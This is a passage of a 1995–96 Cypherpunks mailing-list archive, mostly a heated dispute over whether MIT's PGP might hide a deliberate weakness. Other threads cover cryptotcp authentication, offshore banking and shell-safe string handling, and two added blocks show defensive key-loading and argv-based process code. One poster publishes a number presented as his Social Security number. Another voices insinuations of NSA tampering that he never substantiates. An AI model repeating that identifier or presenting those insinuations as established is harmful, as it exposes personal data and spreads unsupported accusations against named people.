people are somehow tainted and that their work should be especially
mistrusted is harmful and hurtful to them.  To use such implications
as the entire basis for claims about the security of or risks
associated with specific software does not move our understanding of
things forward.  Pointing out something specific, on the other hand,
would move things forward.  I think your "arguments" about this
subject so far have been vague, unscholarly, unprofessional,
needlessly personal, and just plain insulting.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 31 Jul 95 20:38:53 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: There's a hole in your crypto, dear Eliza dear Eliza...
Message-ID: <Pine.ULT.3.91.950731222139.14616A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Alright, here's my 2 cents worth for this petty flamewar...

Once upon a time, there was PGP 2.3.  MIT had nothing to do with it.  The 
population of the net that used the program was fairly small.  In 
addition to being small, they were all (mostly) computer literate 
people.  These people were confident in the security of PGP because they 
had read and understood the source code.  It was checked and declared 
good. 

Then, in stepped MIT.

I, and a few others, raised concerns about a possible conflict of 
interest with MIT distributing the code, and encouraged everyone to 
double check the code for back doors and other NSA nasties.  It was 
checked and declared good.

Now, we are in the present.  MIT is still part of the equation.  However, 
the demographics of the net have changed.  Fewer people are here that (by 
percentage) are computer literate to the level to do source code 
investigations.  A few question why they should trust PGP when they don't 
know it's secure.  We, those who have grown up with PGP, point out that 
it is good, yet that really isn't a great reason to trust it.

So the question is, why should non-technical people believe that PGP is 
good?  They don't have the skills to check it for themselves, and you 
have to admit that the associations of MIT with various TLAs are at the 
very least concerning.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMB2F0DokqlyVGmCFAQGhpgP9EIaGx3cHG78pFic0poPsgI/Yo1UNn6SY
gRG9kfx3M1XzWITND5m2ywUx1B9n48hGoPfgP9ISvGoXDd5/yHgsY6uEjzZCGaLU
tXzace1PvdjL5htH9prvh5GMoghCi34B9cDh01d1U2hKXEypj1pTRA+z+xWUfnGT
teMJ9uEaOu0=
=2aWA
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (SysAdmin)
Date: Mon, 31 Jul 95 19:42:54 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: [NOISE] was Re: a hole in PGP
In-Reply-To: <9508010103.AA06094@all.net>
Message-ID: <m0sd7IY-00027bC@magus.dgsys.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

My response to Dr. Frederick B. Cohen:


I rarely write ANYTHING to the list unless I think it's absolutely
necessary and has a semblance of Crypto (keeps the SNR down).
I'm looking forward to doing something similar to the crack RC4
thing again.
Anyway, after reading the crap below I have been forced to comment.
For an individual that parades the title of Doctor (and the indication 
of intelligence that title should imply) you seem to lack the grasp of what
has been stated over and over again. If you can't study the source code,
find someone that you trust that can! Prove it *doesn't* work before you
knock it.  
Lastly, this interpretation of a threat from being added to a killfile
was the last straw.
Tell the FBI I sent the following Dr.Cohen :   PLONK!
I never play nice.

ObCypherpunk: Anybody heard from Detweiller?


[snipped]

> > You're testing my patience. Feeling flush from my New Orleans road trip, I
> > went out and bought the commercial version of Eudora, filter-feature and
> > all, which means I'm just itching to test it. In other words, it means you
> > are flirting with the kill-file, the bozo-filter, more rudely, a
> > <plonk!ing>.
> 
> Ah!!! A threat.  You should be aware that threatening homicide is a form
> of assault.  I will be certain to tell the FBI your exact words...  "the
> kill-file, the bozo-filter, more rudely, a <plonk!ing>." sounds to me
> (and may well sound to them) like a threat to commit murder. 
> 
> > Play nice, Doc, or don't play at all.
> 
> I am being nice, but you are not.  Perhaps you should consider
> addressing the issues.
> 
> -- 
> -> See: Info-Sec Heaven at URL http://all.net
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
> 


- -- 
==========================================================================
         PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request.
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- 
w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r 
y++ [Geek Code v3.0] a.k.a [ root@magus.dgsys.com / vamagus@delphi.com]
==========================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Protect Your Privacy. Use PGP for all your E-mail security needs!

iQCVAwUBMB2UCLbmxeO+s+1xAQE4fAP/TbNWs17V0U8SVDpp6yaCFGnGelSt4mTL
rXFSChLRtiMq/TevfTi9xmDl0j0gDeXORcpQBWlDi0ZfoownpDxHJJab7u97KlB3
WFho1WGWMXU5kyz+g6HBayPHpckH035R4rmCvGZ1zw1qph2v9NzoDhR+8pTgkCYD
7bOQYV6CKMM=
=K1aG
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 31 Jul 95 20:44:59 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: U.S. Banks are not all that bad
In-Reply-To: <ac419fc0000210046951@[205.199.118.202]>
Message-ID: <Pine.3.89.9507312239.B21268-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


I might have missed the beginning of this thread, but noting the 
complaints that Lucky Green has made, I would submit that he may be 
dealing with a bank in deep financial straits.  The outrageous actions 
he charges follow exactly a pattern noted here in Austin a few years 
ago.  (During the S&L crisis.)  When banks start charging significant 
fees for mundane transactions, hit the exits at a run!  Ignore the major 
rating agencies, as they get their money from the banks. ;-)

IANAFA

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 19:56:43 PDT
To: mab@crypto.com (Matt Blaze)
Subject: Re: a hole in PGP
In-Reply-To: <199508010233.WAA26805@crypto.com>
Message-ID: <9508010250.AA14743@all.net>
MIME-Version: 1.0
Content-Type: text


> >Under what analysis do you construe "It cannot be safely assumed" as
> >"near-defamatory"?
> 
> Because you seem to be pointing a finger at specific people.  Your
> recent messages imply (to me, at least) that you think one or more
> members of the MIT PGP project may have deliberately tampered with
> some of the PGP code.

I don't believe I actually said any such thing.  Perhaps you are not
reading (or I am not writing) carefully enough.  All I think I did was
ask why I should believe they have not when they or those like them have
done it before. 

>  You think the risk of this sort of thing having
> occurred is especially great - greater than with other products, in
> fact - with MIT PGP because of some (unspecified) connection you
> believe MIT has with NSA.  (If I am mistaken here and you don't think
> MIT PGP is at special risk, please clarify this - I suspect others got
> the same impression).

PGP is a product that is specifically disliked by the powers that be
because it provides free access to strong cryptography which is against
the public policy of the US government.  That means that people in that
same said government likely feel it is their duty to make certain that
they can still read PGP mail.

>  PGP did not come from "MIT".  It came from
> specific individuals who work there and who are named in the code and
> documentation.  They have professional and personal reputations and
> feelings just like we all do.  Some of these individuals are on or
> close to this list.  To imply, without offering evidence, that these
> people are somehow tainted and that their work should be especially
> mistrusted is harmful and hurtful to them.

I didn't mean to be hurtful, but I did and do mean to ask why we should
believe that PGP is secure.  Their blind faith is not adequate for the
level of trust being put in PGP - even if they are really sincere.

In terms of implication, I don't believe I implied any such thing.  I
only asked why we should trust them with our individual freedom.

>  To use such implications
> as the entire basis for claims about the security of or risks
> associated with specific software does not move our understanding of
> things forward.  Pointing out something specific, on the other hand,
> would move things forward.  I think your "arguments" about this
> subject so far have been vague, unscholarly, unprofessional,
> needlessly personal, and just plain insulting.

I obviously disagree, but I still haven't heard a single response along
the lines of "here's why we believe it is secure..." I have heard lots
of responses along the lines of "believe us or convince yourself..." and
"read a 'Request for Comments' and that explains it all", but those
leads have not panned out - so far, the RFC tells us that PGP is not
secure and the convince yourself argument holds no water.

The fact is, you seem to support the idea that PGP is secure without a
reasonable basis, and when pushed a bit harder, agree that it probably
is not secure. 

How is it "unscholarly, unprofessional, needlessly personal, and just
plain insulting" to question the idea that hundreds of thousands of
people are trusting their freedom to software that is probably not
secure? I think it is highly unprofessional to try to claim that PGP is
secure and to try to bolster that position by claiming that some
"Request for Comments" supports it when that same said RFC refutes it.

It has been my general impression that "scholarly" means, among other
things, questioning the status quo and finding out where the generally
accepted ideas break down.  I am a professional in the field of
information protection, and I consider it highly unprofessional in this
field to assume that systems are secure without ample evidence to
support it.

So far, I see no ample evidence to support the security of PGP's key
generation algorithm relative to the concerns I have expressed.  Those
concerns are fairly specific as far as I am concerned, but if you feel I
have to demonstrate a specific attack that works in order to question
the adequacy of protection, I think you have it backwards.

If the people at MIT feel personally insulted because I have questioned
their previously accepted ideas, it's just too bad.  I didn't say they
had bad breath or that they were arrogant or that they were ugly, all I
said was that their professional opinions seem to lack adequate
foundation when subjected to scrutiny.  This is professional comment,
not a personal one. 

As far as the potential that they are working with the NSA to subvert
personal privacy, it is a potential, just as it is a potential that I am
working with the NSA to undermine confidence in PGP.  The issue is and
should be, why (specifically) do you believe that PGP is secure.

This is how professionals deal with these sorts of questions:

	If you do not believe it is secure, you should say why not.

	In my case, I question its security and have given at least one
	example of how it could be insecure.

	If you do believe it is secure, you should be able to support
	your contention with more than reference to RFCs, vague
	comments, and claiming that you have read the code and didn't
	catch anything.

	If you cannot specifically address my question, say so, tell us
	all that the security of PGP is an open question, and either
	leave it open or go after closing it.

	OR come up with another alternative that doesn't ignore my question,
	doesn't avoid the issue, doesn't appeal to authority that fails to
	adequately support your contentions, and doesn't claim that I am
	somehow unprofessional or scholarly for questioning an unproven
	contention.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 31 Jul 95 19:43:51 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Attacks on PGP
In-Reply-To: <ac42d74b05021004a9dd@[205.199.118.202]>
Message-ID: <199508010251.WAA26944@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


[good comments deleted]

>The lack of cryptanalysis papers at "Crypto" has been striking...I was told
>that the program committee considers cryptanalysis to be less important
>than original research. (I can see the rationale in this, as Crypto is an
>academic/research conference, and there are really no "engineering" crypto
>conferences. And cryptanalysis might not even fit into an engineering
>conference very well, as cryptanalysis is traditionally a sort of
>"hobbyist" activity--if you've read Kahn you'll know what I mean.)

Tim,

My impression (based on reviewing papers for the last few CRYPTOs and
EUROCRYPTs) is that the reason for the lack of "practical" papers is
primarily that not very many of them get submitted.  In fact, I think
there actually are a fair number of cryptanalysis papers at CRYPTO,
at least compared with the even smaller number of papers there that
describe new ciphers.  Anyway, cryptanalysis IS part of the mainstream
of the academic crypto world these days (consider differential
cryptanalysis, linear cryptanalysis, etc.)

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 20:58:44 PDT
To: hayden@krypton.mankato.msus.edu
Subject: There's a hole in your crypto, dear Eliza dear Eliza...
In-Reply-To: <Pine.ULT.3.91.950731222139.14616A-100000@krypton.mankato.msus.edu>
Message-ID: <199508010354.AA20144@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Why are the arguments on either side so emotional?

Because the alleged possible hole is located in the
random number generator portion of the code.

Random number generation (or more precisely, strong PRNG procedures)
are one of the "hot" buttons of this list in general: no matter how
strong the mechanism is, someone can postulate "a weakness in the
code" that produces "weak" PRN's or gigabuck NSA computers that can
reproduce arbitrary PRN streams. And no one can disprove anything.
Because nothing, really, can be "proved" to be random; it's that darn
halting problem again. All we have are "reasonable" expectations,
which aren't reasonable for a subset of the intended user group.

Okay... sometime this week I'll take a long look at the prng routines
in what PGP source code I have.

I'm doing this in order to keep an open mind, _not_ because I expect
to find anything.

Other than the labeled PRNG/RNG routines, what needs to be looked at?

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 20:04:22 PDT
To: frenchie@magus.dgsys.com (SysAdmin)
Subject: Re: [NOISE] was Re: a hole in PGP
In-Reply-To: <m0sd7IY-00027bC@magus.dgsys.com>
Message-ID: <9508010256.AA15130@all.net>
MIME-Version: 1.0
Content-Type: text


...
> Anyway, after reading the crap below I have been forced to comment.
> For an individual that parades the title of Doctor (and the indication 
> of intelligence that title should imply) you seem to lack the grasp of what
> has been stated over and over again. If you can't study the source code,
> find someone that you trust that can! Prove it *doesn't* work before you
> knock it.  

So you claim that software is secure unless it has been shown to be
insecure, while I claim it is insecure unless it has been shown to be
secure.  Which position do you think more sensible? (rhetorical
question, does not require any responses). 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 23:23:17 PDT
To: cypherpunks@toad.com
Subject: Re: ssh protocol
Message-ID: <199508010620.XAA28764@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Ghio wrote (on cypherpunks):
>I've been playing with the cryptotcp program available from utopia..  It
>has some bugs but works pretty well, if you don't mind waiting 20-30
>seconds at the beginning.  It does a Diffie-Hellman exchange and 3DES over
>telnet.  How hard would it be to add some sort of authentication to this
>program?

I haven't actually compiled the code (it's not very DOS-friendly), but it looks
easily modified; some parts of the problem are still hard, such as identifying
the client to the server.  Some issues to deal with for adding authentication:

0) RSAREF2.0 would have been nice, and comes with D-H and DES.

1) The option negotiation is simple but hard-coded; it would be easy to add
one thing at a time, but would benefit from a more flexible option-negotiator.
That would also let you pretend it was just a general-purpose
telnet-with-various-processors and avoid ITAR restrictions for the
authentication-plus-compression bones version, but the authors, not being
Yankees, don't have to worry about that.

2) Authentication means that some process on each machine is willing to make
a digital signature using a private key - how do you store that key safely?
For a client operated by a human, that's not a big problem; for a server,
or a client operated by a program without a direct user-interface, it's harder.
Do you just leave the key in a file (trusting root?)  Do you only start the
server daemon by hand?  For most Unix applications, I suppose a root-read-only
file containing the key is OK, since if a cracker can read that file you've
got far more serious problems (and the cracker can take over your email anyway.)

3) One big difficulty in authentication systems is securely but conveniently
exchanging authentication parameters; you don't want to risk man-in-the-middle
by trusting keys you got from the other side (otherwise you could use plain
D-H), but getting keys from a keyserver is slow and hard to integrate, and
requiring the other side to already have your key parameters limits your
usefulness.

3A) How do you know who you're talking to so you know which authentication data
to use?  For the client, that's pretty easy - the client knows it's calling
server@foo.bar.edu, so it can get the keys in advance and not worry.
(It still needs the PGP web-of-trust or X.509 hierarchy to validate the keys.)
But how does the server know who the client is?  IP address?  What if it's
spoofed?  What if it does a DNS lookup, which gets spoofed?  You could use a
password-file equivalent, but that does mean you can only send mail to people
who trust you?

3B) How do you do error recovery in PGP, i.e. you either can't find the
other side's keys, or can find them but can't validate them because you
don't have a web of trust that gets from you to them.  Do you just fail the
call?  (That's secure but boring.)
If you complete the call anyway, that means there's a major security risk,
which is that Bad Guys can spoof keys by sending you keys you can't validate.

3C) If you use X.509 hierarchical certification, you _can_ just hand across
the certificate instead of waiting for a PGP keyserver to respond, since the
web of trust is built-in if you're part of the same hierarchy, but there's
still the problem (for the server) of knowing whose certificate to use.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/
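
Added example, not part of Bill Stewart's message or of the cryptotcp code: one way a server daemon could enforce the "root-read-only file containing the key" arrangement from point 2 before it uses the key. The function name, the allowed-owner rule and the sample key bytes are assumptions made for this sketch; it targets POSIX systems.

```python
import os
import stat
import tempfile


class KeyFileError(Exception):
    """The key file failed a safety check and was not read."""


def load_private_key(path, allowed_owners=None):
    """Return the bytes of a private-key file, or raise KeyFileError.

    All checks use fstat() on the opened descriptor rather than stat() on
    the path, so the file cannot be swapped between the check and the read.
    """
    if allowed_owners is None:
        # Assumption: only root or the daemon's own uid may own the key.
        allowed_owners = {0, os.geteuid()}
    # O_NOFOLLOW refuses a symlink planted at the key's path;
    # O_NONBLOCK keeps open() from hanging if the path is a FIFO.
    flags = os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK
    try:
        fd = os.open(path, flags)
    except OSError as exc:
        raise KeyFileError(f"cannot open key file: {exc.strerror}") from exc
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise KeyFileError("not a regular file")
        if st.st_uid not in allowed_owners:
            raise KeyFileError(f"owned by unexpected uid {st.st_uid}")
        extra = stat.S_IMODE(st.st_mode) & 0o077
        if extra:
            raise KeyFileError(f"group/other permission bits set: {extra:03o}")
        with os.fdopen(fd, "rb", closefd=False) as fh:
            return fh.read()
    finally:
        os.close(fd)


def _try(path):
    """Report the outcome of loading one path as a short string."""
    try:
        load_private_key(path)
        return "loaded"
    except KeyFileError as exc:
        return f"rejected: {exc}"


def demo():
    """Run the loader against constructed files in a private temp dir."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        key = os.path.join(d, "server.key")
        fd = os.open(key, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        os.write(fd, b"CONSTRUCTED-SAMPLE-KEY-MATERIAL\n")  # not a real key
        os.close(fd)

        os.chmod(key, 0o600)            # owner-only: accepted
        results["mode_600"] = _try(key)

        os.chmod(key, 0o640)            # group-readable: refused
        results["mode_640"] = _try(key)

        os.chmod(key, 0o600)
        link = os.path.join(d, "link.key")
        os.symlink(key, link)           # symlink to a good key: refused
        results["symlink"] = _try(link)

        results["missing"] = _try(os.path.join(d, "absent.key"))
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:10s} {outcome}")
```

This only narrows who can read the file; as the message says, an intruder who already has root defeats it.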





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 23:23:45 PDT
To: Mike Bailey <bailey@computek.net>
Subject: Currency risk on bank accounts (Was: Zimmermann legal fund)
Message-ID: <199508010621.XAA28791@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > > The US banking industry has gone to the dogs. The day a non-US bank
>> > > offers an account that can be accessed over the net will be the day I
>> > > close my US accounts.
Some of the Channel Island banks offer accounts with ATM cards;
I think some of them are in Jersey (you don't have to remind people
you didn't say _New_ Jersey :-)

>I open an account with U.S. $$ in a foreign bank who uses francs  ... a month 
>later the franc loses 20 % of its value as compared to the U.S. dollar. 

Happens to me all the time - I deposit my money in a dollar-based account,
the dollar takes a dive relative to the Yen, so my account's worth 20% less
in new Japanese cars...   Most of the banks in major European banking
centers and other banking-haven countries will let you have accounts in your
choice of major currencies, and a number of the smaller countries have local
currencies that keep parity with the US dollar or British pound.  That means
your account
really has X US dollars in it, not X-US-dollars-converted-to-francs-on-deposit,
or maybe X Bahamian dollars which are officially worth X US dollars but
may be harder to withdraw quickly.

There is still some risk that (for example) the Bahamas government may
decide to default on its foreign debt by suddenly declaring the Bahamas
dollar to no longer match US dollars, but you can only get away with that
sort of thing once, so it's a desperation move, the kind of thing you do just
before or after the revolution.
You're more at risk from small private banks that are offering high rates of
interest on foreign deposits because they're ripping off their depositors,
e.g. BCCI or Nugan Hand, but that's more risk in the Caribbean than Europe
(where the big risk is that they're paying you less interest than you might
get in the US, or where the local tax on bank-interest may be higher than
your US tax rate.)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 31 Jul 95 21:33:51 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: OS noise  [Was: a hole in PGP]
In-Reply-To: <199508010213.AA07127@tyrell.net>
Message-ID: <Pine.3.89.9507312331.E21268-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Phil Fraering wrote:

> For better or for worse, we all must use programs (or collections
> of programs) that large or larger: even if PGP could be implemented
> in 1 % of the current source code, it would still be running in an
> operating system that's cramped in 4 megabytes of ram, because that's
> a characteristic of the common modern operating systems.

Ahem!  Commiedore APOLOGIZED when it released its 512K OS a couple of 
years ago.  These things _don't_ have to be this large.

> The operating systems PGP is running in are larger than PGP itself;

Got that straight!

> which isn't a bad idea. This isn't meant to be a disendorsement of
> Unix.)

Oh, please!  Now that I'm back with my direct connection, I want another 
OS holy war!  I want to killfile LOTS of people (or two people in 
particular).

> What OS should I use to do this? Should I just give up on anything
> beyond TRS-DOS 6.2?

No!  Use UltraDos.  Much better!

Nathan

Now THAT's noise....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 31 Jul 95 20:33:43 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
In-Reply-To: <9508010250.AA14743@all.net>
Message-ID: <199508010341.XAA27354@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


>> >Under what analysis do you construe "It cannot be safely assumed" as
>> >"near-defamatory"?
>> 
>> Because you seem to be pointing a finger at specific people.  Your
>> recent messages imply (to me, at least) that you think one or more
>> members of the MIT PGP project may have deliberately tampered with
>> some of the PGP code.
>
>I don't believe I actually said any such thing.  Perhaps you are not
>reading (or I am not writing) carefully enough.  All I think I did was
>ask why I should believe they have not when they or those like them have
>done it before. 

This speaks for itself.  "They or those like them," indeed!

...

>
>The fact is, you seem to support the idea that PGP is secure without a
>reasonable basis, and when pushed a bit harder, agree that it probably
>is not secure. 
>

I never made any claim that PGP is "secure".  Quite the contrary -
I've been complaining about the security implications of PGP's
monolithic structure and complexity since I first saw the code, though
I did state the basis on which I trust it little less than I trust
other software of equal complexity.  Primarily, however, I jumped in
to this discussion to take issue with your unfair implication that
there is reason to suspect deliberate wrongdoing on the part of the
MIT people.  If your remarks are based on some specific information
you know about some person or group, please tell us.  Otherwise, it
would be a shame to allow your credibility to taint these people in the
backs of people's minds just for the sake of a casual, throwaway
rhetorical device.  There is no need to raise the specter of an evil
conspiracy to make your point.  It's irrelevant and beneath you, based
on what I've read of your earlier work on viruses.

Feel free to have the last word if you'd like, since we seem to AGREE
that PGP needs more analysis and scrutiny.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 20:58:04 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Stopped at the boarder
In-Reply-To: <ac42d74b05021004a9dd@[205.199.118.202]>
Message-ID: <9508010351.AA18289@all.net>
MIME-Version: 1.0
Content-Type: text


> Maybe Fred can tell us if it's really true
> that he was stopped by U.S. Customs and held for many hours at the Canadian
> border when going to or returning from a conference where he described
> computer viruses....

Not for many hours, but we had an interesting non-discussion, and there
was a really thorough search of my bags (every piece of paper was
individually examined in great detail and a guard was subtly added to
the other side of the line).  They looked at every slide, checked out
the bags themselves for secret compartments, but the one thing they
didn't do was check the contents of my floppy disks.  Isn't technology
wonderful?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 31 Jul 95 20:58:16 PDT
To: rsalz@osf.org
Subject: Re: Set phone permit "wire" taps
Message-ID: <9508010357.AA12449@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to keep cluttering up the list.  I'll try to make this my last
message in this thread.

You did not answer my request.  Of course you're under no obligation
to do so, but a claim like the following:
>I've been arrested too many times, and done enough local, state, and
>federal time to know.
Is just too hard to accept without verification.  Please tell me, if not
the whole list, where and when you've been incarcerated -- preferably at
the federal level -- so that I can, say, call the warden and verify.

>Now SHOW ME something.

Sure, what? If you have more questions after looking at my homepage
http://www.osf.org/~rsalz/ let me know.  Or for more fun, here's my
SSN: 314-15-9265.

>You sure question a lotta credentials,
>like you've REALLY been somewhere or done something.

I don't see how these two parts relate, but I've never done anything cool
like you might be thinking of.  In my professional life I'm primarily a
programmer who's written lots of code, and been able to give away some of
it.

I just think you're a fake.

>Love Always,

Kisses to you too, but I'm still waiting for an answer.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@cs.byu.edu>
Date: Wed, 1 Nov 1995 09:22:23 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: ecash remailer
In-Reply-To: <199510311940.OAA31415@opine.cs.umass.edu>
Message-ID: <ML-1.3.1.807585540.6838.don@jacob.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>  > perpetrator, let's see... it's Ed.  Ed is now charged with theft and
>  > has an expensive and uncertain legal experience ahead of him.
>  
>  Alice-frames-Ed situation is functionally equivalent to the Bob-robs-Charlie
>  situation from the bank's perspective.

I suppose the word "receipt" might be handy to introduce into the entire
scheme. A dispute over who paid & who stole is solved with paperwork of some
sort. Although a digital signature is not necessarily valid (I don't even know
what the Utah Digital Signature Law does) but the bank, as rule-setter
is allowed to say that a digital receipt DOES bind the parties in some
way.

Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wendell Lee <wendell@singnet.com.sg>
Date: Wed, 28 Aug 1996 17:47:21 +0800
To: cypherpunks@toad.com
Subject: [Fwd: Re: Code Review Guidelines (draft)]
Message-ID: <304171D2.77A3@singnet.com.sg>
MIME-Version: 1.0
Content-Type: text/plain

unsubcribe wendell@singnet.com.sg


To: hag@ai.mit.edu
Subject: Re: Code Review Guidelines (draft)
From: lists@lina.inka.de (Bernd Eckenfels)
Date: Wed, 28 Aug 1996 03:30:49 +0200 (MET DST)
Cc: ichudov@algebra.com, adam@homeport.org, firewalls@greatcircle.com,       cypherpunks@toad.com, coderpunks@toad.com
In-Reply-To: <199608272111.RAA23997@galapas.ai.mit.edu> from "Daniel Hagerty" at Aug 27, 96 05:11:39 pm
Sender: owner-cypherpunks@toad.com

Hi,

>     Much better, look at rfc822.  (I wouldn't consider *anything* that
> has the word "sendmail" in it a good reference).

It's much better if you don't rely on the content of the string at all. Don't
use sh -c or system and you will be safe. Simply assume that all characters
are valid in user-supplied strings and treat them exactly that way... If they
need to be exported then unfortunately they need to be 'untainted' and this
should be done by positive not negative lists as mentioned in the
guidelines.

Greetings
Bernd

PS: I have collected the references on
http://www.inka.de/sites/lina/freefire-l/
-- 
  (OO)      -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de --
 ( .. )   ecki@{lina.inka.de,linux.de}  http://home.pages.de/~eckes/
  o--o     *plush*  2048/A2C51749  eckes@irc  +4972573817  *plush*
(O____O)       If privacy is outlawed only Outlaws have privacy
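
The advice in the message above, as an added example in C that is not part of the original post or of the guidelines draft: the same user-supplied string is handed to a program once through "sh -c" and once as a plain argv element, followed by a positive-list check for strings that must be exported to a parser. The function names, the use of printf as the target program, the sample string, the allowed character set and the 64-byte limit are all assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Positive list for strings that must be exported to a parser (a shell,
 * a mailer): accept only characters known to be harmless, rather than
 * trying to enumerate the dangerous ones. The set is an assumption. */
int is_untainted(const char *s)
{
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
                             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._@+-";
    size_t n = strlen(s);

    if (n == 0 || n > 64 || s[0] == '-')  /* empty, oversized, option-like */
        return 0;
    return strspn(s, ok) == n;
}

/* Run argv[0] with the given argument vector, capture its stdout in out
 * (NUL-terminated, truncated to fit), return its exit status or -1. */
static int run_capture(char *const argv[], char *out, size_t outlen)
{
    int fds[2], status;
    size_t used = 0;
    ssize_t r;
    pid_t pid;

    if (outlen == 0 || pipe(fds) != 0)
        return -1;
    pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {                       /* child: stdout -> pipe, exec */
        close(fds[0]);
        dup2(fds[1], STDOUT_FILENO);
        close(fds[1]);
        execvp(argv[0], argv);
        _exit(127);                       /* exec failed */
    }
    close(fds[1]);
    while (used + 1 < outlen &&
           (r = read(fds[0], out + used, outlen - 1 - used)) > 0)
        used += (size_t)r;
    out[used] = '\0';
    close(fds[0]);
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

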